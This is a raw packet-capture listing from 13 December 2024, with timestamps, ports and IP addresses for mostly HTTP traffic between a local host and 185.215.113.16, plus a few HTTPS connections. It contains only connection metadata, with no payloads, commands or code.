Dec 13, 2024 18:54:02.261173010 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.269444942 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.269495964 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.269545078 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.269588947 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.277796984 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.277853966 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.277909040 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.277956963 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.286294937 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.286350012 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.286389112 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.286439896 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.294645071 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.294684887 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.294728994 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.294770956 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.303076029 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.303116083 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.303158045 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.303203106 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.311815977 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.311865091 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.312001944 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.312042952 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.319900990 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.319955111 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.319993019 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.320038080 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.327498913 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.327547073 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.327590942 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.327636957 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.440438032 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.440499067 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.440510988 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.440558910 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.443100929 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.443150997 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.443159103 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.443205118 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.447995901 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.448055983 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.448107004 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.448153973 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.453039885 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.453102112 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.453198910 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.453248978 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.458033085 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.458095074 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.458168030 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.458219051 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.462887049 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.462937117 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.462982893 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.463027000 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.467607975 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.467659950 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.467696905 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.467750072 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.472456932 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.472516060 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.472521067 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.472579956 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.477253914 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.477309942 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.477384090 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.477435112 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.482023954 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.482081890 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.482130051 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.482177019 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.486799955 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.486849070 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.486903906 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.486948013 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.488696098 CET	49950	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.488805056 CET	443	49950	172.217.19.228	192.168.2.7
Dec 13, 2024 18:54:02.488888025 CET	49950	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.490330935 CET	49951	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.490432978 CET	443	49951	172.217.19.228	192.168.2.7
Dec 13, 2024 18:54:02.490502119 CET	49951	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.491230965 CET	49950	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.491266966 CET	443	49950	172.217.19.228	192.168.2.7
Dec 13, 2024 18:54:02.491523027 CET	49951	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.491559029 CET	443	49951	172.217.19.228	192.168.2.7
Dec 13, 2024 18:54:02.491655111 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.491702080 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.491758108 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.491830111 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.496490955 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.496542931 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.496588945 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.496629000 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.501240015 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.501291990 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.501434088 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.501475096 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.506046057 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.506104946 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.506151915 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.506195068 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.510839939 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.510886908 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.510960102 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.511003971 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.515697002 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.515739918 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.515820980 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.515855074 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.520677090 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.520718098 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.520752907 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.520790100 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.525346041 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.525403023 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.525568962 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.525609016 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.530268908 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.530318022 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.530405998 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.530451059 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.534787893 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.534846067 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.559235096 CET	49930	80	192.168.2.7	80.82.65.70
Dec 13, 2024 18:54:02.632364988 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.632425070 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.632498980 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.632544041 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.633518934 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.633565903 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.633630991 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.633673906 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.637523890 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.637586117 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.637593985 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.637635946 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.641562939 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.641619921 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.641663074 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.641712904 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.645545006 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.645611048 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.645659924 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.645705938 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.649497986 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.649544954 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.649672031 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.649717093 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.653242111 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.653306961 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.653379917 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.653420925 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.657396078 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.657407999 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.657465935 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.660540104 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.660593987 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.660639048 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.660684109 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.664047003 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.664130926 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.664133072 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.664186954 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.667594910 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.667646885 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.667664051 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.667711973 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.671153069 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.671202898 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.671209097 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.671256065 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.674638987 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.674690008 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.674741983 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.674793959 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.678225040 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.678289890 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.678324938 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.678385019 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.679016113 CET	80	49930	80.82.65.70	192.168.2.7
Dec 13, 2024 18:54:02.681783915 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.681833982 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.681902885 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.681946993 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.685303926 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.685353041 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.685589075 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.685636997 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.688822031 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.688870907 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.688981056 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.689028025 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.692378998 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.692430019 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.692584991 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.692627907 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.695992947 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.696047068 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.696058035 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.696099043 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.699404955 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.699445009 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.699505091 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.699620008 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.702953100 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.702997923 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.703043938 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.703080893 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.706480980 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.706523895 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.706603050 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.706640005 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.710078955 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.710117102 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.710180044 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.710220098 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.715419054 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.715470076 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.715552092 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.715591908 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.717108011 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.717154026 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.717204094 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.717246056 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.720694065 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.720736980 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.720791101 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.720828056 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.724174023 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.724220991 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.824584961 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.824620008 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.824659109 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.824708939 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.826015949 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.826066017 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.826113939 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.826163054 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.828782082 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.828830957 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.828881979 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.828927994 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.831449986 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.831500053 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.831569910 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.831619024 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.834290028 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.834340096 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.834381104 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.834424973 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.837073088 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.837122917 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.837199926 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.837245941 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.839883089 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.839943886 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.839992046 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.840039968 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.840239048 CET	49957	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.840269089 CET	443	49957	172.217.19.228	192.168.2.7
Dec 13, 2024 18:54:02.840317965 CET	49957	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.840681076 CET	49958	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.840696096 CET	443	49958	172.217.19.228	192.168.2.7
Dec 13, 2024 18:54:02.840748072 CET	49958	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.840909958 CET	49959	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.840918064 CET	443	49959	172.217.19.228	192.168.2.7
Dec 13, 2024 18:54:02.840962887 CET	49959	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.841346025 CET	49957	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.841357946 CET	443	49957	172.217.19.228	192.168.2.7
Dec 13, 2024 18:54:02.841603041 CET	49958	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.841615915 CET	443	49958	172.217.19.228	192.168.2.7
Dec 13, 2024 18:54:02.841888905 CET	49959	443	192.168.2.7	172.217.19.228
Dec 13, 2024 18:54:02.841897011 CET	443	49959	172.217.19.228	192.168.2.7
Dec 13, 2024 18:54:02.842379093 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.842436075 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.842508078 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.842554092 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.844969034 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.845022917 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.845062017 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.845107079 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.847491026 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.847541094 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.847609043 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.847656965 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.849957943 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.850009918 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.850256920 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.850342035 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.852482080 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.852543116 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.852663040 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.852710009 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.855082989 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.855129957 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.855241060 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.855288029 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.857537985 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.857584953 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.857625008 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.857661009 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.859996080 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.860042095 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.860136986 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.860181093 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.862518072 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.862565041 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.862615108 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.862663984 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.865012884 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.865061998 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.865134001 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.865184069 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.867474079 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.867523909 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.867609978 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.867660046 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.870003939 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.870054960 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.870106936 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.870151997 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.872522116 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.872570038 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.872706890 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.872752905 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.874995947 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.875053883 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.875128031 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.875178099 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.879017115 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.879029036 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.879071951 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.879103899 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.879988909 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.880050898 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.880125999 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.880172014 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.882703066 CET	80	49944	185.215.113.16	192.168.2.7
